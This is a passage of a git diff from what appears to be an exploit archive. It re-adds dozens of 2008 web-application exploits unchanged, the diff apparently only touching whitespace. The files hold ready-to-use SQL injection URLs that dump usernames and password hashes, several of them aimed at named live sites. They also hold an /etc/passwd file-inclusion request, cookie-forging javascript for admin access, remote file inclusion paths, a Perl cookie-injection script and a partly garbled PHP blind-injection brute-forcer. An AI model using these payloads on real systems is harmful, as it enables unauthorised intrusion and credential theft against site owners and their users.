-site.il/section.php?name=../../../../etc/passwd
-
-# milw0rm.com [2008-09-21]
+|___________________________________________________|
+|
+| 6rbScript V3.3 Local file Vulnerability
+|
+|___________________________________________________
+|                                                   |
+|
+| script : www.6rbscript.com
+|
+| DorK   : inurl:"section.php?name=singers"
+| dorK   : Powered By 6rbScript V3.3
+|___________________________________________________|
+ 
+Author : Stack
+ 
+Expl need magic quote = off & open basdir = off in many server
+ 
+site.il/section.php?name=../../../../etc/passwd
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6521.txt b/platforms/php/webapps/6521.txt
index ddd3d804a..2d21bbdff 100755
--- a/platforms/php/webapps/6521.txt
+++ b/platforms/php/webapps/6521.txt
@@ -1,10 +1,10 @@
-###############################################################################################
-[+]   Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack                
-[+] Greetz : All my freind               
-################################################################################################
----
-exploit:
-javascript:document.cookie = "usuario=1; path=/"; document.cookie = "pass=1; path=/";
-
-# milw0rm.com [2008-09-21]
+###############################################################################################
+[+]   Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack                
+[+] Greetz : All my freind               
+################################################################################################
+---
+exploit:
+javascript:document.cookie = "usuario=1; path=/"; document.cookie = "pass=1; path=/";
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6522.txt b/platforms/php/webapps/6522.txt
index 7417d9565..843309e03 100755
--- a/platforms/php/webapps/6522.txt
+++ b/platforms/php/webapps/6522.txt
@@ -1,61 +1,61 @@
-|___________________________________________________|
-|
-| Article Script (view.php v ) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.availscript.com/article_script.php
-|
-| DorK   : :)
-|___________________________________________________|
-
-
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--
-
-
-
-L!VE DEMO:
-
-
-http://www.availscript.com/article_script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--
-
-
-
-Login :
-
-www.[target].com/Script/admin/login.php
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
-|______________________________________________________________________
-
-
-                             Im IRAQi
-
-# milw0rm.com [2008-09-21]
+|___________________________________________________|
+|
+| Article Script (view.php v ) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.availscript.com/article_script.php
+|
+| DorK   : :)
+|___________________________________________________|
+
+
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--
+
+
+
+L!VE DEMO:
+
+
+http://www.availscript.com/article_script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--
+
+
+
+Login :
+
+www.[target].com/Script/admin/login.php
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
+|______________________________________________________________________
+
+
+                             Im IRAQi
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6524.txt b/platforms/php/webapps/6524.txt
index 49c05f477..a445cb54b 100755
--- a/platforms/php/webapps/6524.txt
+++ b/platforms/php/webapps/6524.txt
@@ -1,34 +1,34 @@
-[~] WSN Links 2.23 AND 2.22 (vote.php) - SQL Injection Vulnerability
-[~]
-[~] http://scripts.webmastersite.net/wsnlinks/
-[~] ----------------------------------------------------------
-[~] Bug founded by d3v1l
-[~]
-[~] Date: 21.09.2008
-[~]
-[~]
-[~] d3v1l@spoofer.com
-[~]
-[~] -----------------------------------------------------------
-[~] Greetz tO:-
-[~] 
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~] 
-[~] Pentest|Gibon|Pig
-[~]-------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
-[~]   
-[~] Demo :-
-[~]
-[~] 2.22
-[~] 
-[~] http://www.bujinkantrollhattan.com/scripts/wsnlinks/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
-[~] 
-[~] 2.23
-[~]  
-[~] http://linkit.kalikos.org/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
-[~]----------------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-09-22]
+[~] WSN Links 2.23 AND 2.22 (vote.php) - SQL Injection Vulnerability
+[~]
+[~] http://scripts.webmastersite.net/wsnlinks/
+[~] ----------------------------------------------------------
+[~] Bug founded by d3v1l
+[~]
+[~] Date: 21.09.2008
+[~]
+[~]
+[~] d3v1l@spoofer.com
+[~]
+[~] -----------------------------------------------------------
+[~] Greetz tO:-
+[~] 
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~] 
+[~] Pentest|Gibon|Pig
+[~]-------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
+[~]   
+[~] Demo :-
+[~]
+[~] 2.22
+[~] 
+[~] http://www.bujinkantrollhattan.com/scripts/wsnlinks/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
+[~] 
+[~] 2.23
+[~]  
+[~] http://linkit.kalikos.org/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
+[~]----------------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6525.txt b/platforms/php/webapps/6525.txt
index a6fe3d23d..db2c0fbf1 100755
--- a/platforms/php/webapps/6525.txt
+++ b/platforms/php/webapps/6525.txt
@@ -1,34 +1,34 @@
-[~] WSN Links 2.20 (comments.php) - SQL Injection Vulnerability
-[~]
-[~] http://scripts.webmastersite.net/wsnlinks/
-[~] ----------------------------------------------------------
-[~] Bug founded by d3v1l
-[~]
-[~] Date: 21.09.2008
-[~]
-[~]
-[~] d3v1l@spoofer.com
-[~]
-[~] -----------------------------------------------------------
-[~] Greetz tO:-
-[~] 
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~] 
-[~] Pentest|Gibon|Pig
-[~]-------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
-[~]
-[~] http://site.com/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
-[~]
-[~] 
-[~] Demo :- 
-[~]
-[~] http://www.lara.on.ca/business/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
-[~]
-[~] http://www.lara.on.ca/business/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
-[~]
-[~]----------------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-09-22]
+[~] WSN Links 2.20 (comments.php) - SQL Injection Vulnerability
+[~]
+[~] http://scripts.webmastersite.net/wsnlinks/
+[~] ----------------------------------------------------------
+[~] Bug founded by d3v1l
+[~]
+[~] Date: 21.09.2008
+[~]
+[~]
+[~] d3v1l@spoofer.com
+[~]
+[~] -----------------------------------------------------------
+[~] Greetz tO:-
+[~] 
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~] 
+[~] Pentest|Gibon|Pig
+[~]-------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
+[~]
+[~] http://site.com/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
+[~]
+[~] 
+[~] Demo :- 
+[~]
+[~] http://www.lara.on.ca/business/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
+[~]
+[~] http://www.lara.on.ca/business/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
+[~]
+[~]----------------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6526.txt b/platforms/php/webapps/6526.txt
index 7a0ec9a9e..10b2fb2e0 100755
--- a/platforms/php/webapps/6526.txt
+++ b/platforms/php/webapps/6526.txt
@@ -1,11 +1,11 @@
-###############################################################################################
-[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack                
-[+] Greetz : All my freind               
-################################################################################################
----
-exploit:
-javascript:document.cookie = "phpicalendar_login=1; path=/";
-javascript:document.cookie = "phpicalendar=1; path=/";
-
-# milw0rm.com [2008-09-22]
+###############################################################################################
+[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack                
+[+] Greetz : All my freind               
+################################################################################################
+---
+exploit:
+javascript:document.cookie = "phpicalendar_login=1; path=/";
+javascript:document.cookie = "phpicalendar=1; path=/";
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6527.txt b/platforms/php/webapps/6527.txt
index 5517835d9..13effc035 100755
--- a/platforms/php/webapps/6527.txt
+++ b/platforms/php/webapps/6527.txt
@@ -1,17 +1,17 @@
-BuzzyWall <= 1.3.1 SQL Injection Vulnerability
-
-Author: ~!Dok_tOR!~
-Date found: 31.08.08
-Product: BuzzyWall
-Version: 1.3.1
-Price: 40$
-URL: www.buzzscripts.com
-Download script: http://nullstore.net/Reaper/4ptp1chdeais/BuzzyWall.v1.3.1.Nulled.rar.html
-Vulnerability Class: SQL Injection
-Condition: magic_quotes_gpc = Off
-
-Exploit:
-
-http://localhost/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*
-
-# milw0rm.com [2008-09-22]
+BuzzyWall <= 1.3.1 SQL Injection Vulnerability
+
+Author: ~!Dok_tOR!~
+Date found: 31.08.08
+Product: BuzzyWall
+Version: 1.3.1
+Price: 40$
+URL: www.buzzscripts.com
+Download script: http://nullstore.net/Reaper/4ptp1chdeais/BuzzyWall.v1.3.1.Nulled.rar.html
+Vulnerability Class: SQL Injection
+Condition: magic_quotes_gpc = Off
+
+Exploit:
+
+http://localhost/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6529.php b/platforms/php/webapps/6529.php
index 75bb7f45e..fcad059de 100755
--- a/platforms/php/webapps/6529.php
+++ b/platforms/php/webapps/6529.php
@@ -1,67 +1,67 @@
-[-]Powered by WSN Links Free 4.0.34P Blind SQL Injection
- 
-By Stack
-
-exploit:
-http://site.com/path/comments.php?id=1 and 2>1/*   #the page fully loaded
-http://site.com/path/comments.php?id=1 and 1>3/*   #page loaded whit any data and some error that say
- "No such content exists. The link you are following seems to have been incorrect."
-cheking the mysql version:
-http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=5
-or
-http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=4
-# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
-simple exploit to get user()
-" ,'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','.','*','%','é','&' );
-echo "\n[+] BF Longeur User : ";
-$stop = false ;
-while($stop == false){
- $lenregexp = stringtohex('^.{'.$login_len.'}$');
- $xurl = $url."+AND+(SELECT+user())+REGEXP+$lenregexp/**" ;
- $rep = file_get_contents($xurl);
- if(preg_match("#$regexp#",$rep)){
-  echo $login_len ;
-  $stop = true ;
- }
- if($stop == false) $login_len++ ;
-}
-echo "\n[+] BF du User : ";
-for($i=0; $i<= $login_len; $i++){
- $ok = false ; 
- foreach($alphabet_Stack as $Stackl){
-  if($ok == true) continue ;
-  $like = stringtohex($login.$Stackl);
-  $urlx = $url."+AND+(SELECT+user())+LIKE+concat($like,0x25)/*";
-  $rep = file_get_contents($urlx) ;
- 
-  if(preg_match("#$regexp#",$rep)){
-   echo $Stackl ;
-   $login .= $Stackl ;
-   $ok = true ;
-  }
- }
-}
-echo "\n\n[+] Injection Completed \n";
-echo "\t User : $login\n\t";
-?>
-
-# milw0rm.com [2008-09-22]
+[-]Powered by WSN Links Free 4.0.34P Blind SQL Injection
+ 
+By Stack
+
+exploit:
+http://site.com/path/comments.php?id=1 and 2>1/*   #the page fully loaded
+http://site.com/path/comments.php?id=1 and 1>3/*   #page loaded whit any data and some error that say
+ "No such content exists. The link you are following seems to have been incorrect."
+cheking the mysql version:
+http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=5
+or
+http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=4
+# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
+simple exploit to get user()
+" ,'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','.','*','%','é','&' );
+echo "\n[+] BF Longeur User : ";
+$stop = false ;
+while($stop == false){
+ $lenregexp = stringtohex('^.{'.$login_len.'}$');
+ $xurl = $url."+AND+(SELECT+user())+REGEXP+$lenregexp/**" ;
+ $rep = file_get_contents($xurl);
+ if(preg_match("#$regexp#",$rep)){
+  echo $login_len ;
+  $stop = true ;
+ }
+ if($stop == false) $login_len++ ;
+}
+echo "\n[+] BF du User : ";
+for($i=0; $i<= $login_len; $i++){
+ $ok = false ; 
+ foreach($alphabet_Stack as $Stackl){
+  if($ok == true) continue ;
+  $like = stringtohex($login.$Stackl);
+  $urlx = $url."+AND+(SELECT+user())+LIKE+concat($like,0x25)/*";
+  $rep = file_get_contents($urlx) ;
+ 
+  if(preg_match("#$regexp#",$rep)){
+   echo $Stackl ;
+   $login .= $Stackl ;
+   $ok = true ;
+  }
+ }
+}
+echo "\n\n[+] Injection Completed \n";
+echo "\t User : $login\n\t";
+?>
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6531.txt b/platforms/php/webapps/6531.txt
index e42d38c80..50acd0cfd 100755
--- a/platforms/php/webapps/6531.txt
+++ b/platforms/php/webapps/6531.txt
@@ -1,48 +1,48 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-MyBlog <= 0.9.8: PHP and MySQL Blog/CMS software / Cookie poisioning
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-$ Program: MyBlog
-$ File affected: all /admin/*.php files
-$ Version: 0.9.8
-$ Download: http://sourceforge.net/projects/myblog/
-
-
-Found by Pepelux 
-eNYe-Sec - www.enye-sec.org
-
-MyBlog is an open source Blog/CMS project. It allows begginers to have a 
-simple to use blog/cms and it will still please developers with feature 
-packed system with plugins, themes and modules.
-
-
-You can alter cookies to get admin privileges.
-
-
-Code of add.php:
-
-
-
-If you try to enter http://blog/admin you obtain: 'Please Login' and the cookie
-is some likes that:
-
-login=Pepelux; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926
-
-But if you change the cookie and put, for example:
-
-admin=yes; login=admin; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926
-
-Then you obtain complete access to the admin panel.
-
-Exploit:
-javascript:document.cookie = "admin=yes; login=admin";
-
-# milw0rm.com [2008-09-22]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+MyBlog <= 0.9.8: PHP and MySQL Blog/CMS software / Cookie poisioning
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+$ Program: MyBlog
+$ File affected: all /admin/*.php files
+$ Version: 0.9.8
+$ Download: http://sourceforge.net/projects/myblog/
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+MyBlog is an open source Blog/CMS project. It allows begginers to have a 
+simple to use blog/cms and it will still please developers with feature 
+packed system with plugins, themes and modules.
+
+
+You can alter cookies to get admin privileges.
+
+
+Code of add.php:
+
+
+
+If you try to enter http://blog/admin you obtain: 'Please Login' and the cookie
+is some likes that:
+
+login=Pepelux; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926
+
+But if you change the cookie and put, for example:
+
+admin=yes; login=admin; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926
+
+Then you obtain complete access to the admin panel.
+
+Exploit:
+javascript:document.cookie = "admin=yes; login=admin";
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6533.txt b/platforms/php/webapps/6533.txt
index d88bd55d8..2251035ef 100755
--- a/platforms/php/webapps/6533.txt
+++ b/platforms/php/webapps/6533.txt
@@ -1,36 +1,35 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- #####################################################################
- #  [ basebuilder <= 2.0.1 ]   Remote File Inclusion Vulnerability   #
- #####################################################################
- #
- # Script site: http://basebuilder.sourceforge.net/
- # Download: http://sourceforge.net/project/showfiles.php?group_id=110199
- #
- # Vuln: http://site.com/basebuilder/src/main.inc.php?mj_config[src_path]=[spread???]
- #      
- #
- # Bug: ./basebuilder-2.0.1/src/main.inc.php (line: 56)
- #
- # ...
- #	include($mj_config['src_path'] . '/classes/class.mj.basebuilder.inc.php');
- # ... 	 
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-22]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ #####################################################################
+ #  [ basebuilder <= 2.0.1 ]   Remote File Inclusion Vulnerability   #
+ #####################################################################
+ #
+ # Script site: http://basebuilder.sourceforge.net/
+ # Download: http://sourceforge.net/project/showfiles.php?group_id=110199
+ #
+ # Vuln: http://site.com/basebuilder/src/main.inc.php?mj_config[src_path]=[spread???]
+ #      
+ #
+ # Bug: ./basebuilder-2.0.1/src/main.inc.php (line: 56)
+ #
+ # ...
+ #	include($mj_config['src_path'] . '/classes/class.mj.basebuilder.inc.php');
+ # ... 	 
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6535.txt b/platforms/php/webapps/6535.txt
index 7db323198..0ef3c0c4f 100755
--- a/platforms/php/webapps/6535.txt
+++ b/platforms/php/webapps/6535.txt
@@ -1,39 +1,39 @@
-[~]------------------------------------------------------------------------------
-[~] Fez software Version 1.3 AND 2.0 RC1 (list.php) - SQL Injection Vulnerability
-[~]
-[~] http://sourceforge.net/projects/fez
-[~]
-[~] About:- [Fez is an open source project to produce and maintain a highly flexible web interface to FEDORA
-[~]       for any Library or Institution to configure and publish or archive documents of any type sustainably.]
-[~]
-[~] ----------------------------------------------------------
-[~] Bug founded by d3v1l
-[~]
-[~] Date: 22.09.2008
-[~]
-[~]
-[~] d3v1l@spoofer.com
-[~]
-[~] -----------------------------------------------------------
-[~] Greetz tO:-
-[~]
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~]
-[~] Pentest|Gibon|Pig       and milw0rm Staff
-[~]-------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
-[~]
-[~] Demo :- 1.3
-[~]
-[~] http://repository.openpolytechnic.ac.nz/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
-[~]
-[~]
-[~] Demo :- 2.0 RC1
-[~]
-[~] http://avi.lib.cas.cz/sandbox/fex/trunk/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
-[~]
-[~]-----------------------------------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-09-22]
+[~]------------------------------------------------------------------------------
+[~] Fez software Version 1.3 AND 2.0 RC1 (list.php) - SQL Injection Vulnerability
+[~]
+[~] http://sourceforge.net/projects/fez
+[~]
+[~] About:- [Fez is an open source project to produce and maintain a highly flexible web interface to FEDORA
+[~]       for any Library or Institution to configure and publish or archive documents of any type sustainably.]
+[~]
+[~] ----------------------------------------------------------
+[~] Bug founded by d3v1l
+[~]
+[~] Date: 22.09.2008
+[~]
+[~]
+[~] d3v1l@spoofer.com
+[~]
+[~] -----------------------------------------------------------
+[~] Greetz tO:-
+[~]
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~]
+[~] Pentest|Gibon|Pig       and milw0rm Staff
+[~]-------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
+[~]
+[~] Demo :- 1.3
+[~]
+[~] http://repository.openpolytechnic.ac.nz/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
+[~]
+[~]
+[~] Demo :- 2.0 RC1
+[~]
+[~] http://avi.lib.cas.cz/sandbox/fex/trunk/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
+[~]
+[~]-----------------------------------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6536.pl b/platforms/php/webapps/6536.pl
index a8510b32a..5dec6b508 100755
--- a/platforms/php/webapps/6536.pl
+++ b/platforms/php/webapps/6536.pl
@@ -1,60 +1,60 @@
-#!/usr/bin/perl
-#
-#	CJ Ultra Plus <= v1.0.4 Cookie SQL Injection
-#
-#	found and coded by -SmoG-  /\GermAn hAckZ0r
-#	contact: ICQ - 266836394
-# 
-#	
-#	
-#
-#	hints:	- sometimes the parameter "SID" is different to the normal one... 
-#			- i extract the hash from the html-code... but i was 2 lazy for coding a good working filter
-#			- salted DES (normaly "aa" will be the salt, but it can be different)
-#			- ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendly with ur feedback...
-#
-#
-#			>>> GretzZz 2: pronoobz.org - Wesker, China Sun and all other memberZz <<<
-
-use LWP::UserAgent;
- 
-if ($#ARGV+1 !=1) {
-print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n";
-print "found and coded by -SmoG-\n";
-print "\n\nUsage: perl xploit.pl -victim\n";
-print "       perl xploit.pl http://gayxboy.com/\n\n";				#LiVe-Dem0! letZz pwnz the pedophile!!
-exit();
-}
-print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n";
-print "\nstarting exploit...";
-$target=$ARGV[0];
-chomp($target);
-if($target !~ /^http:\/\//)
-{
-	$target = "http://".$target;
-}
-if($target !~ /\/$/)
-{
-	$target .= "/";
-}
-@header = ('Cookie' => "SID='UNION SELECT b12 from settings/*");
-$ua = LWP::UserAgent->new;
-$ua->timeout(10);
-$ua->env_proxy;
-$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
-$response = $ua->get($target, @header);
-if ($response->is_success)
-{
-$temp = $response->content;
-if ($temp =~/(.*)SID=(.*);/)
-	{
-	$result=substr($temp,85,13); 
-	print "\n\adminhash: "; print $result;
-	}
-}
-else
-{
- die "Error: ".$response->status_line;
-}
-
-# milw0rm.com [2008-09-22]
+#!/usr/bin/perl
+#
+#	CJ Ultra Plus <= v1.0.4 Cookie SQL Injection
+#
+#	found and coded by -SmoG-  /\GermAn hAckZ0r
+#	contact: ICQ - 266836394
+# 
+#	
+#	
+#
+#	hints:	- sometimes the parameter "SID" is different to the normal one... 
+#			- i extract the hash from the html-code... but i was 2 lazy for coding a good working filter
+#			- salted DES (normaly "aa" will be the salt, but it can be different)
+#			- ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendly with ur feedback...
+#
+#
+#			>>> GretzZz 2: pronoobz.org - Wesker, China Sun and all other memberZz <<<
+
+use LWP::UserAgent;
+ 
+if ($#ARGV+1 !=1) {
+print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n";
+print "found and coded by -SmoG-\n";
+print "\n\nUsage: perl xploit.pl -victim\n";
+print "       perl xploit.pl http://gayxboy.com/\n\n";				#LiVe-Dem0! letZz pwnz the pedophile!!
+exit();
+}
+print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n";
+print "\nstarting exploit...";
+$target=$ARGV[0];
+chomp($target);
+if($target !~ /^http:\/\//)
+{
+	$target = "http://".$target;
+}
+if($target !~ /\/$/)
+{
+	$target .= "/";
+}
+@header = ('Cookie' => "SID='UNION SELECT b12 from settings/*");
+$ua = LWP::UserAgent->new;
+$ua->timeout(10);
+$ua->env_proxy;
+$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
+$response = $ua->get($target, @header);
+if ($response->is_success)
+{
+$temp = $response->content;
+if ($temp =~/(.*)SID=(.*);/)
+	{
+	$result=substr($temp,85,13); 
+	print "\n\adminhash: "; print $result;
+	}
+}
+else
+{
+ die "Error: ".$response->status_line;
+}
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6538.txt b/platforms/php/webapps/6538.txt
index 31d549cef..3af4c3b3f 100755
--- a/platforms/php/webapps/6538.txt
+++ b/platforms/php/webapps/6538.txt
@@ -1,39 +1,38 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- #####################################################################
- #  [ OpenRat <= 0.8-beta4 ]   Remote File Inclusion Vulnerability   #
- #####################################################################
- #
- # Script: "OpenRat is a free Web Content-Management-System."
- #
- # Script site: http://www.openrat.de/
- # Download: http://www.openrat.de/download/  
- #           http://dl.openrat.de/openrat-cvs-2007-12-05.tar.gz
- #
- # Vuln: http://site.com/openrat/themes/default/include/html/insert.inc.php?tpl_dir=[spread???]
- #      
- #
- # Bug: ./openrat/themes/default/include/html/insert.inc.php
- #
- # ...
- # 	
- # ... 	 
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-23]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
